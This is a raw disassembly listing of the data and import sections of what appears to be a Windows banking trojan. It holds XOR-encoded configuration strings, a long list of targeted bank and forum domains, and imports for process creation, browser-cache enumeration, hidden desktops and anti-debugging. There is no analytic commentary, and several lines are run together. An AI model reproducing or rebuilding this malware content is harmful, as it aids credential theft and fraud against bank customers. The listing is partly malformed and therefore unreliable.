db 59h, 4Eh, 0
byte_446FBF db 60h ; DATA XREF: sub_4061F7+1EA�o
dd 4C445975h, 594E5350h, 59445912h
db 1Ch, 0
aLHt db 'l]HT',0 ; DATA XREF: sub_4061F7+B5�o
byte_446FD3 db 6Fh ; DATA XREF: sub_4061F7+A3�o
dd 4B485A53h, 60594E5Dh, 4E5F5571h, 5A534F53h, 79756048h
dd 48596F1Ch, 6F604C49h, 4C494859h
db 0
byte_446FF5 db 7Dh, 2 dup(4Ch) ; DATA XREF: sub_405E88+333�o
dd 52594A79h, 6F604F48h, 5159545Fh, 7D604F59h, 604F4C4Ch
dd 504C4479h, 4E594E53h, 485F7D60h, 485D4A55h, 785B5255h
dd 51495F53h, 60485259h, 4E497F12h, 4852594Eh
db 0
byte_447031 db 7Dh, 2 dup(4Ch) ; DATA XREF: sub_405E88+309�o
dd 52594A79h, 6F604F48h, 5159545Fh, 7D604F59h, 604F4C4Ch
dd 504C4479h, 4E594E53h, 4A5D7260h, 485D5B55h, 605B5255h
dd 4E497F12h, 4852594Eh
db 0
aPsPioynszzpury db '{PS^]PiOYNsZZPURY',0 ; DATA XREF: sub_405E88+2CC�o
byte_447077 db 6Fh ; DATA XREF: sub_405E88+2BA�o
dd 4B485A53h, 60594E5Dh, 4E5F5571h, 5A534F53h, 556B6048h
dd 4B535852h, 497F604Fh, 52594E4Eh, 4E596A48h, 5253554Fh
dd 48527560h, 59524E59h, 596F1C48h, 52554848h
db 5Bh, 4Fh, 0
byte_4470B3 db 55h ; DATA XREF: sub_405E88+271�o
dd 504C4459h, 12594E53h, 594459h
dword_4470C0 dd 6F604F19h, 4B485A53h, 60594E5Dh, 4E5F5571h, 5A534F53h
; DATA XREF: sub_405E88+245�o
dd 52756048h, 524E5948h, 791C4859h, 53504C44h, 604E594Eh
dd 52555D71h, 5D597A60h, 594E4948h, 4852537Fh, 6050534Eh
dd 687D797Ah, 63796E69h, 7D7F7370h, 7F7D7170h, 79727574h
dd 7F737063h, 6B737877h
db 72h, 0
word_44711A dw 5945h ; DATA XREF: sub_405E88+1E1�o
db 4Fh, 0
aNskoyryklns_yo db '~NSKOYrYKlNS_YOO',0 ; DATA XREF: sub_405E88+1CF�o
byte_44712F db 12h ; DATA XREF: sub_405E88+1BD�o
dd 7D7A7978h, 60687069h, 687A736Fh, 796E7D6Bh, 5F557160h
dd 534F534Eh, 6B60485Ah, 53585255h, 7F604F4Bh
aInnyrhjynousrY db 'INNYRHjYNOUSR`yDLPSNYN`~NSKOYrYKlNS_YOO',0
dword_44717C dd 687A736Fh, 796E7D6Bh, 50536C60h, 59555F55h, 5571604Fh
; DATA XREF: sub_405E88+101�o
dd 4F534E5Fh, 60485A53h, 5852556Bh, 604F4B53h, 4E4E497Fh
dd 6A485259h, 554F4E59h, 75605253h, 4E594852h, 1C485952h
dd 4848596Fh, 4F5B5255h, 52536660h, 19604F59h
db 49h, 0
word_4471CA dw 0A0Dh ; DATA XREF: sub_405E88+7A�o
; sub_405E88+B7�o ...
db 0Ch, 0Dh, 0
byte_4471CF db 6Fh ; DATA XREF: sub_405E88+54�o
dd 6B687A73h, 60796E7Dh, 4E5F5571h, 5A534F53h, 556B6048h
dd 4B535852h, 497F604Fh, 52594E4Eh, 4E596A48h, 5253554Fh
dd 48527560h, 59524E59h, 596F1C48h, 52554848h, 66604F5Bh
dd 4F595253h, 491960h
dword_447214 dd 48541300h, 25051hdword_44721C dd 535E1300h, 24558hdword_447224 dd 5F4F1300h, 484C554Eh db 2, 0
word_44722E dw 594Fh ; DATA XREF: sub_4054C8+84A�o
dd 51556848h, 48495359h, 4F191E14h, 101E1514h, 7154919h
db 0
byte_447245 db 41h, 0 ; DATA XREF: sub_4054C8+825�o
byte_447247 db 58h ; DATA XREF: sub_4054C8+7DB�o
dd 51495F53h, 12485259h, 4F124F19h, 55515E49h, 7151448h
db 0
byte_44725D db 5Ah, 49h, 52h ; DATA XREF: sub_4054C8+79B�o
dd 5355485Fh, 4F191C52h, 471514h
dword_44726C dd 12195F19h db 0Eh, 49h, 0
byte_447273 db 0 ; DATA XREF: sub_4054C8+6F1�o
dd 554E5F4Fh, 2484Ch
dword_44727C dd 535A1300h, 2514Ehdword_447284 dd 4C525500h, 481C4849h, 1594C45h, 5E494F1Eh, 1E485551h
; DATA XREF: sub_4054C8+6A8�o
dd 505D4A1Ch, 1B015949h
db 1Bh, 2, 0
off_4472A3 dd offset loc_404F16+3 ; DATA XREF: sub_4054C8+565�o
byte_4472A7 db 0 ; DATA XREF: sub_4054C8+494�o
; sub_4054C8+612�o
dd 494C5255h, 45481C48h, 1E01594Ch, 48555859h, 5D4A1C1Eh
dd 1594950h, 1B4F191Bh, 515D521Ch, 191B0159h, 1B49194Fh
dd 4E5E0002h, 363102h
dword_4472D8 dd 4C525500h, 481C4849h, 1594C45h, 5558591Eh, 4A1C1E48h
; DATA XREF: sub_4054C8+326�o
dd 5949505Dh, 49191B01h, 5D521C1Bh, 1B015951h, 21B5Dh
dd 31024E5Eh
db 36h, 0
word_447306 dw 5A00h ; DATA XREF: sub_4054C8+2C9�o
dd 1C514E53h, 55485F5Dh, 1E015253h, 1C1E4F19h, 54485951h
dd 1E015853h, 686F736Ch, 5D521C1Eh, 1E015951h, 21E4F19h
db 0
byte_447331 db 5Ah, 19h, 12h ; DATA XREF: sub_4054C8+286�o
db 0Fh, 49h, 0
byte_447337 db 0 ; DATA XREF: sub_4054C8+250�o
dd 4558535Eh
db 2, 0
word_44733E dw 1300h ; DATA XREF: sub_4054C8+224�o
dd 585D5954h
db 2, 0
aMicrosoftCorp db 'MicroSoft-Corp',0 ; DATA XREF: sub_4054C8+1F8�o
; sub_4061F7+350�o
byte_447355 db 0, 48h, 55h ; DATA XREF: sub_4054C8+1E8�o
dd 2595048h, 49194F19h, 55481300h, 2595048h
db 0
byte_447369 db 0, 54h, 59h ; DATA XREF: sub_4054C8+1BF�o
dd 2585Dh
dword_447370 dd 51485400h db 50h, 2, 0
byte_447377 db 12h ; DATA XREF: sub_4054C8+168�o
dd 514854h
dword_44737C dd 5F194F19h ; sub_4054C8+412�o
db 19h, 5Fh, 0
byte_447383 db 16h ; DATA XREF: sub_40523D:loc_4052F5�o
db 12h, 16h, 0
byte_447387 db 3 ; DATA XREF: sub_40523D+4D�o
db 0
byte_447389 db 56h, 5Eh, 17h ; DATA XREF: sub_404EC6+15E�o
db 0Eh, 0
word_44738E dw 175Eh ; DATA XREF: sub_404EC6+FA�o
db 0Eh, 0
word_447392 dw 34Bh ; DATA XREF: sub_404EC6+8C�o
dd 13494B5Eh, 494B5E03h, 4B5E0313h, 5E031349h, 313494Bh
dd 13494B5Eh, 494B5E03h
db 13h, 3, 0
byte_4473B3 db 28h ; DATA XREF: sub_404EC6+57�o
dd 0E175E56h
db 56h, 0
aKsI_3 db 'Ĉ',0 ; DATA XREF: sub_404D2E+95�o
aKI_0 db 'Ĉ',0 ; DATA XREF: sub_404D2E+5D�o
aKsI_2 db '',0 ; DATA XREF: sub_404D2E+14�o
aKsI_1 db 'È',0 ; DATA XREF: sub_404B85+190�o
aKsI_0 db 'Ԉ',0 ; DATA XREF: sub_404B85+168�o
aKsI db '߈',0 ; DATA XREF: sub_404B85+130�o
aKI_1 db '߈',0 ; DATA XREF: sub_404B85+103�o
aKI_2 db 'È',0 ; DATA XREF: sub_404B85+DB�o
aKI_3 db 'Ԉ',0 ; DATA XREF: sub_404B85+99�o
aKI db 'Ĉ',0 ; DATA XREF: sub_404B85+63�o
aIiic db '',0 ; DATA XREF: sub_40481B+200�o
aKciic db '',0 ; DATA XREF: sub_40481B+6D�o
asc_447400 db '',0 ; DATA XREF: sub_40479E+64�o
; sub_404D2E+DE�o
aSsuUU db 'ՓՓջ',0 ; DATA XREF: sub_40470D+46�o
aCuUUClcuN db 'ĖՓՓՖÍ',0 ; DATA XREF: sub_4045EF+6F�o
aCS db '',0 ; DATA XREF: sub_4045EF+39�o
aUU db 'œ',0 ; DATA XREF: sub_4045EF-31�o
; sub_40481B+AB�o ...
aSC db '',0 ; DATA XREF: sub_404586+2�o
aBlind_user db 'blind_user',0 ; DATA XREF: sub_4043CA+65�o
; sub_40446E+12�o
aSS db '麵ٺ',0 ; DATA XREF: sub_4040AA+247�o
dword_447440 dd 0F5F5F6A0h, 0DA9097EAh, 0BAF6FFFEh, 0F4A4E9BFh, 9097F6EFh
; DATA XREF: sub_4040AA+1D4�o
dd 0BAFCF3DAh, 0E9F3E2FFh, 0E9BFBAEEh, 0EEF5FDBAh, 0F5F6BAF5h
dd 9097EAF5h, 0F6FFFEDAh, 0A4E9BFBAh, 97F6EFF4h
db 90h, 0
word_44747A dw 0F9C6h ; DATA XREF: sub_4040AA+16F�o
dd 0FBF7F7F5h, 0F9B4FEF4h
db 0F5h, 0F7h, 0
byte_447487 db 0BFh ; DATA XREF: sub_4040AA+13C�o
dd 0F5F9C6E9h, 0F4FBF7F7h, 0F3EAB4FEh
db 0FCh, 0
word_447496 dw 0E9BFh ; DATA XREF: sub_4040AA+117�o
dd 0F6E9E2C6h, 0A3F6FEFCh, 0FBF8B4E2h
db 0EEh, 0
word_4474A6 dw 0F9C6h ; DATA XREF: sub_4040AA+DB�o
dd 0FFB4FEF7h
db 0E2h, 0FFh, 0
byte_4474AF db 0BFh ; DATA XREF: sub_4040AA+BB�o
dd 0F7F9C6E9h, 0F3EAB4FEh
db 0FCh, 0
word_4474BA dw 0E9BFh ; DATA XREF: sub_4040AA+9B�o
dd 0F6E9E2C6h, 0F4F6FEFCh, 0FBF8B4EEh
db 0EEh, 0
aKNoLEfLKNeoOke db ''
; DATA XREF: sub_403BE7+332�o
db '',0
aSiLnN db '',0 ; DATA XREF: sub_403BE7+30D�o
aNLF db '',0 ; DATA XREF: sub_403BE7+2FB�o
byte_447529 db 0 ; DATA XREF: sub_403BE7+2DE�o
; sub_405E88+317�o ...
word_44752A dw 959Ah ; DATA XREF: sub_403BE7+2B4�o
dd 859D908Ah, 9085AAFCh, 0B6AB89B7h, 0ABBC8ABAh, 0EAABBCAFh
db 0EBh, 0
word_447542 dw 0AAFCh ; DATA XREF: sub_403BE7+210�o
dd 0F7AAFC85h, 0B5B5BDh
dword_44754C dd 0EDE9FCA2h, 0EDE9FC81h, 0E9FCF481h, 0FCF481EDh, 0F481EDE9h
; DATA XREF: sub_403BE7+2B�o
dd 81EDE9FCh, 0EDE9FCF4h, 2 dup(0EDE9FC81h)
db 81h, 0A4h, 0
byte_447573 db 0F9h ; DATA XREF: sub_403A5F+130�o
db 0
byte_447575 db 0FCh, 0AAh, 85h ; DATA XREF: sub_403A5F+53�o
dd 0BCF7AAFCh
db 0A1h, 0BCh, 0
byte_44757F db 0FCh ; DATA XREF: sub_40399B+7D�o
dd 81E1E9h
aVgu: ; DATA XREF: sub_4037CA+32�o
; .text:00403896�o ...
unicode 0, <V>
aXs db '',0 ; DATA XREF: sub_40341E+32�o
; sub_40349A+3F�o
aChevychasebank db 'chevychasebank.com',0 ; DATA XREF: .data:0043C1E0�o
aGronxplanets_r db 'gronxplanets.ru',0 ; DATA XREF: .data:0043C1DC�o
aWww_mdmbank_ru db 'www.mdmbank.ru',0 ; DATA XREF: .data:0043C1D8�o
aFethard_biz db 'fethard.biz',0 ; DATA XREF: .data:0043C1D4�o
aRoyalbank_com db 'royalbank.com',0 ; DATA XREF: .data:0043C1D0�o
aSecuritylab_ru db 'securitylab.ru',0 ; DATA XREF: .data:0043C1CC�o
aTatNeftbank_ru db 'tat-neftbank.ru',0 ; DATA XREF: .data:0043C1C8�o
aSeclab_ru db 'seclab.ru',0 ; DATA XREF: .data:0043C1C4�o
aOpenbank_com db 'openbank.com',0 ; DATA XREF: .data:0043C1C0�o
aGutabank_ru db 'gutabank.ru',0 ; DATA XREF: .data:0043C1BC�o
aWww_b2bTrust_c db 'www.b2b-trust.com',0 ; DATA XREF: .data:0043C1B8�o
aGrepwareFacili db 'grepware-facility.ru',0 ; DATA XREF: .data:0043C1B4�o
aWww_uralsib_ru db 'www.uralsib.ru',0 ; DATA XREF: .data:0043C1B0�o
a53bank_com db '53bank.com',0 ; DATA XREF: .data:0043C1AC�o
aWww_nbc_caInde db 'www.nbc.ca/index.php',0 ; DATA XREF: .data:0043C1A8�o
aTotallyfreeban db 'totallyfreebanking.com',0 ; DATA XREF: .data:0043C1A4�o
aBarclays_com db 'barclays.com',0 ; DATA XREF: .data:0043C1A0�o
aWww_lbcdirect_ db 'www.lbcdirect.laurentianbank.ca/index.php',0
; DATA XREF: .data:0043C19C�o
aKidosBank_ru db 'kidos-bank.ru',0 ; DATA XREF: .data:0043C198�o
aYambo_biz db 'yambo.biz',0 ; DATA XREF: .data:0043C194�o
aProrat_net db 'prorat.net',0 ; DATA XREF: .data:0043C190�o
aWww1_hsbc_caIn db 'www1.hsbc.ca/index.php',0 ; DATA XREF: .data:0043C18C�o
aWww_ovk_ru db 'www.ovk.ru',0 ; DATA XREF: .data:0043C188�o
aWww_rbc_com db 'www.rbc.com',0 ; DATA XREF: .data:0043C184�o
aMasterX_comFor db 'master-x.com/forum/',0 ; DATA XREF: .data:0043C180�o
aWww_allahabadb db 'www.allahabadbank.com',0 ; DATA XREF: .data:0043C17C�o
aOnlineBusiness db 'online-business.lloydstsb.co.uk',0 ; DATA XREF: .data:0043C178�o
aMyonlineaccoun db 'myonlineaccounts2.abbeynational.co.uk',0 ; DATA XREF: .data:0043C174�o
aWww_absolutban db 'www.absolutbank.ru',0 ; DATA XREF: .data:0043C170�o
aKavkazcenter_c db 'kavkazcenter.com/russ',0 ; DATA XREF: .data:0043C16C�o
aWww_netmagiste db 'www.netmagister.com',0 ; DATA XREF: .data:0043C168�o
aWww_kmb_ru db 'www.kmb.ru',0 ; DATA XREF: .data:0043C164�o
aWww_spyinstruc db 'www.spyinstructors.com',0 ; DATA XREF: .data:0043C160�o
aAcroleinHawk_r db 'acrolein-hawk.rubanking.halifax-online.co.uk',0
; DATA XREF: .data:0043C15C�o
aWww_icbank_ru db 'www.icbank.ru',0 ; DATA XREF: .data:0043C158�o
aWww_bankofindi db 'www.bankofindia.com',0 ; DATA XREF: .data:0043C154�o
aPizdabolInc_ru db 'pizdabol-inc.ru',0 ; DATA XREF: .data:0043C150�o
aWww_sbrf_ru db 'www.sbrf.ru',0 ; DATA XREF: .data:0043C14C�o
aWww_candidatev db 'www.candidateverifier.com/index.php',0 ; DATA XREF: .data:0043C148�o
aWww_worldbank_ db 'www.worldbank.org/index.php',0 ; DATA XREF: .data:0043C144�o
aDigitalRelaxkg db 'digital-relaxkgb.ru',0 ; DATA XREF: .data:0043C140�o
aAsmworm_com db 'asmworm.com',0 ; DATA XREF: .data:0043C138�o
aAtmacasoft_com db 'atmacasoft.com',0 ; DATA XREF: .data:0043C134�o
aCrutop_nuVbu_1 db 'crutop.nu/vbulletin/showthread.php',0 ; DATA XREF: .data:0043C130�o
aWww_uniastrum_ db 'www.uniastrum.ru',0 ; DATA XREF: .data:0043C12C�o
aCrutop_nuVbu_0 db 'crutop.nu/vbulletin/forumdisplay.php',0 ; DATA XREF: .data:0043C128�o
aWww_mmbank_ru db 'www.mmbank.ru',0 ; DATA XREF: .data:0043C124�o
aCrutop_nuVbull db 'crutop.nu/vbulletin/',0 ; DATA XREF: .data:0043C120�o
aAlfabank_ru db 'alfabank.ru',0 ; DATA XREF: .data:0043C11C�o
aHyperSpaceFuel db 'hyper-space-fuel.ru',0 ; DATA XREF: .data:0043C118�o
aWww_cwbank_com db 'www.cwbank.com',0 ; DATA XREF: .data:0043C114�o
aWww_vtb_ru db 'www.vtb.ru',0 ; DATA XREF: .data:0043C110�o
aWww_cibc_com db 'www.cibc.com',0 ; DATA XREF: .data:0043C10C�o
aWww_bankofmadu db 'www.bankofmadura.com',0 ; DATA XREF: .data:0043C108�o
aWww_bmo_com db 'www.bmo.com',0 ; DATA XREF: .data:0043C104�o
aWww_bankBanque db 'www.bank-banque-canada.ca/index.php',0 ; DATA XREF: .data:0043C100�o
aWww_masterbank db 'www.masterbank.ru',0 ; DATA XREF: .data:0043C0FC�o
aEbookfinaltras db 'ebookfinaltrash.ru',0 ; DATA XREF: .data:0043C0F8�o
aMasterX_com db 'master-x.com',0 ; DATA XREF: .data:0043C0F4�o
aWww_bbin_ru db 'www.bbin.ru',0 ; DATA XREF: .data:0043C0F0�o
aOlb2_nationet_ db 'olb2.nationet.com',0 ; DATA XREF: .data:0043C0EC�o
aWelcome3_smile db 'welcome3.smile.co.uk',0 ; DATA XREF: .data:0043C0E8�o
aWww_baltbank_r db 'www.baltbank.ru',0 ; DATA XREF: .data:0043C0E4�o
aNew_egg_com db 'new.egg.com',0 ; DATA XREF: .data:0043C0E0�o
aProdexteam_n_1 db 'prodexteam.netcrutop.nu',0 ; DATA XREF: .data:0043C0DC�o
aWww_proxySocks db 'www.proxy-socks.net',0 ; DATA XREF: .data:0043C0D8�o
; .data:0043C13C�o
aWww_cbr_ru db 'www.cbr.ru',0 ; DATA XREF: .data:0043C0D4�o
aProdexteam_n_0 db 'prodexteam.net/main.htm',0 ; DATA XREF: .data:0043C0D0�o
aProdexteam_net db 'prodexteam.net',0 ; DATA XREF: .data:0043C0CC�o
aChechenpress_i db 'chechenpress.info',0 ; DATA XREF: .data:0043C0C8�o
aSiliconfirewar db 'siliconfireware.ru',0 ; DATA XREF: .data:off_43C0C4�o
db '://',0
align 4
dword_447ACC dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_447ADC dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; sub_406D2E+92D�o
dword_447AEC dd 3050F1F7h, 11CF98B5h, 0AA0082BBh, 0BCEBD00hdword_447AFC dd 332C4427h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_447B0C dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7hdword_447B1C dd 2 dup(0) dd 0C0h, 46000000h
dword_447B2C dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fhdword_447B3C dd 10h dup(0) ; sub_40BCDC:loc_40BCF6�o ...
dword_447B7C dd 0 ; sub_40BC80:loc_40BCC2�o ...
dd 0Fh dup(0)
dword_447BBC dd 0 ; sub_40BDE5+825�r
dword_447BC0 dd 0 ; sub_40BDE5+82C�r
dword_447BC4 dd 0 ; sub_40BDE5+834�r
dword_447BC8 dd 0 ; sub_40BDE5+83C�r
align 800h
_data ends
; Section 4. (virtual address 00048000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00048000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 448000h
off_448000 dd offset dword_44810C ; DATA XREF: .idata:00448E00�o
dd 2 dup(0)
dd offset dword_44810C
dd offset dword_44810C
off_448014 dd offset dword_44811C ; DATA XREF: .idata:00448E10�o
; .idata:00448E14�o
align 10h
dd offset dword_44811C
dd offset dword_44811C
off_448028 dd offset dword_448134 ; DATA XREF: .idata:00448E24�o
; .idata:00448E28�o ...
dd 2 dup(0)
dd offset dword_448134
dd offset dword_448134
off_44803C dd offset dword_448214 ; DATA XREF: .idata:00448E44�o
; .idata:00448E48�o ...
dd 2 dup(0)
dd offset dword_448214
dd offset dword_448214
off_448050 dd offset dword_448290 ; DATA XREF: .idata:00448F28�o
; .idata:00448F2C�o ...
dd 2 dup(0)
dd offset dword_448290
dd offset dword_448290
off_448064 dd offset dword_4482AC ; DATA XREF: .idata:00448FA8�o
; .idata:00448FAC�o ...
align 10h
dd offset dword_4482AC
dd offset dword_4482AC
off_448078 dd offset dword_4482E8 ; DATA XREF: .idata:00448FCC�o
; .idata:00448FD0�o ...
dd 2 dup(0)
dd offset dword_4482E8
dd offset dword_4482E8
off_44808C dd offset dword_448338 ; DATA XREF: .idata:0044900C�o
; .idata:00449010�o ...
dd 2 dup(0)
dd offset dword_448338
dd offset dword_448338
dd 1Ah dup(0)
dd 48574h
dword_44810C dd 2 dup(0) ; .idata:0044800C�o ...
dd 48588h, 485A4h
dword_44811C dd 2 dup(0) ; .idata:00448020�o ...
dd 485C0h, 485D4h, 485E8h, 485F8h
dword_448134 dd 2 dup(0) ; .idata:00448034�o ...
dd 4860Ch, 4861Ch, 4862Ch, 48648h, 4865Ch, 48674h, 4868Ch
dd 4869Ch, 486ACh, 486BCh, 486D4h, 486E8h, 486FCh, 48710h
dd 48728h, 48738h, 48748h, 48758h, 48768h, 48778h, 48790h
dd 487A8h, 487BCh, 487D0h, 487E4h, 487FCh, 48814h, 48824h
dd 48834h, 48848h, 48858h, 48864h, 48874h, 48880h, 48890h
dd 488A0h, 488ACh, 488B8h, 488C8h, 488D8h, 488ECh, 488FCh
dd 48904h, 48918h, 48928h, 48938h, 48948h, 48960h, 4896Ch
dd 48978h, 48988h, 48994h, 489A0h, 489B4h
dword_448214 dd 2 dup(0) ; .idata:00448048�o ...
dd 489C4h, 489D8h, 489ECh, 489FCh, 48A0Ch, 48A18h, 48A28h
dd 48A34h, 48A4Ch, 48A5Ch, 48A68h, 48A74h, 48A84h, 48A94h
dd 48AA8h, 48ABCh, 48AD0h, 48AE4h, 48AF8h, 48B0Ch, 48B20h
dd 48B2Ch, 48B3Ch, 48B50h, 48B64h, 48B74h, 48B88h, 48B98h
dd 48BA8h
dword_448290 dd 2 dup(0) ; .idata:0044805C�o ...
dd 48BBCh, 48BD0h, 48BE0h, 48BF0h, 48C08h
dword_4482AC dd 2 dup(0) ; .idata:00448070�o ...
dd 48C18h, 48C2Ch, 48C44h, 48C58h, 48C68h, 48C78h, 48C8Ch
dd 48CA0h, 48CB4h, 48CC8h, 48CDCh, 48CF8h, 48D10h
dword_4482E8 dd 2 dup(0) ; .idata:00448084�o ...
dd 48D2Ch, 48D34h, 48D44h, 48D50h, 48D5Ch, 48D64h, 48D6Ch
dd 48D78h, 48D84h, 48D90h, 48D98h, 48DA0h, 48DACh, 48DB8h
dd 48DC0h, 48DCCh, 48DD8h, 48DE4h
dword_448338 dd 2 dup(0) ; .idata:00448098�o ...
dword_448340 dd 77124C05h dd 2 dup(0)
dword_44834C dd 42C2DE3Dh ; resolved to->WININET.FindFirstUrlCacheEntryAdword_448350 dd 42C2E399h ; resolved to->WININET.FindNextUrlCacheEntryA dd 2 dup(0)
dword_44835C dd 774FFAC3h dword_448360 dd 7750CB9Ch dword_448364 dd 77502A37h dword_448368 dd 774FEE36h dd 2 dup(0)
dword_448374 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileAdword_448378 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_44837C dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_448380 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_448384 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessIddword_448388 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_44838C dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_448390 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_448394 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_448398 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_44839C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4483A0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_4483A4 dd 7C80ABC1h ; resolved to->KERNEL32.GetProcessHeapdword_4483A8 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4483AC dd 7C809B47h ; resolved to->KERNEL32.CloseHandledword_4483B0 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_4483B4 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_4483B8 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4483BC dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_4483C0 dd 7C821BA5h ; resolved to->KERNEL32.GetVolumeInformationAdword_4483C4 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_4483C8 dd 7C8360A9h ; resolved to->KERNEL32.GlobalAddAtomAdword_4483CC dd 7C830BBBh ; resolved to->KERNEL32.GlobalDeleteAtomdword_4483D0 dd 7C8360C3h ; resolved to->KERNEL32.GlobalFindAtomAdword_4483D4 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_4483D8 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrementdword_4483DC dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_4483E0 dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_4483E4 dd 7C813093h ; resolved to->KERNEL32.IsDebuggerPresentdword_4483E8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_4483EC dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_4483F0 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_4483F4 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4483F8 dd 7C80EA1Bh ; resolved to->KERNEL32.OpenMutexAdword_4483FC dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_448400 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_448404 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_448408 dd 7C90311Bh ; resolved to->NTDLL.RtlZeroMemorydword_44840C dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_448410 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_448414 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_448418 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_44841C dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_448420 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_448424 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_448428 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuerydword_44842C dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiBytedword_448430 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_448434 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_448438 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_44843C dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_448440 dd 7C809A09h ; resolved to->KERNEL32.lstrlenWdword_448444 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_448448 dd 7C810637h ; resolved to->KERNEL32.CreateThread dd 2 dup(0)
dword_448454 dd 7E41F642h ; resolved to->USER32.CallWindowProcAdword_448458 dd 7E43212Bh ; resolved to->USER32.GetWindowTextAdword_44845C dd 7E41B6D4h ; resolved to->USER32.GetWindowRectdword_448460 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_448464 dd 7E41BC7Dh ; resolved to->USER32.GetWindowdword_448468 dd 7E42F420h ; resolved to->USER32.GetClassNameAdword_44846C dd 7E41DA60h ; resolved to->USER32.SetFocusdword_448470 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_448474 dd 7E41EF69h ; resolved to->USER32.LoadCursorAdword_448478 dd 7E418C2Eh ; resolved to->USER32.SetTimerdword_44847C dd 7E4208CEh ; resolved to->USER32.LoadIconAdword_448480 dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_448484 dd 7E42E002h ; resolved to->USER32.GetMessageAdword_448488 dd 7E41945Dh ; resolved to->USER32.GetWindowLongAdword_44848C dd 7E41D60Dh ; resolved to->USER32.SetWindowLongAdword_448490 dd 7E455BD7h ; resolved to->USER32.CreateDesktopAdword_448494 dd 7E42E8D1h ; resolved to->USER32.SetThreadDesktopdword_448498 dd 7E419A51h ; resolved to->USER32.GetThreadDesktopdword_44849C dd 7E418BF6h ; resolved to->USER32.TranslateMessagedword_4484A0 dd 7E4196B8h ; resolved to->USER32.DispatchMessageAdword_4484A4 dd 7E41A8ADh ; resolved to->USER32.wsprintfAdword_4484A8 dd 7E42F383h ; resolved to->USER32.SendMessageAdword_4484AC dd 7E420A36h ; resolved to->USER32.RegisterClassAdword_4484B0 dd 7E42E1D1h ; resolved to->USER32.PostQuitMessagedword_4484B4 dd 7E41D8A4h ; resolved to->USER32.ShowWindowdword_4484B8 dd 7E41FF33h ; resolved to->USER32.CreateWindowExAdword_4484BC dd 7E41DAEAh ; resolved to->USER32.DestroyWindowdword_4484C0 dd 7E41DBECh ; resolved to->USER32.MoveWindowdword_4484C4 dd 7E41D4EEh ; resolved to->USER32.DefWindowProcA align 10h
dword_4484D0 dd 77F161D1h ; resolved to->GDI32.GetStockObjectdword_4484D4 dd 77F15E39h ; resolved to->GDI32.SetBkColordword_4484D8 dd 77F15D87h ; resolved to->GDI32.SetTextColordword_4484DC dd 77F1D991h ; resolved to->GDI32.CreateBrushIndirectdword_4484E0 dd 77F3B730h ; resolved to->GDI32.CreateFontA dd 2 dup(0)
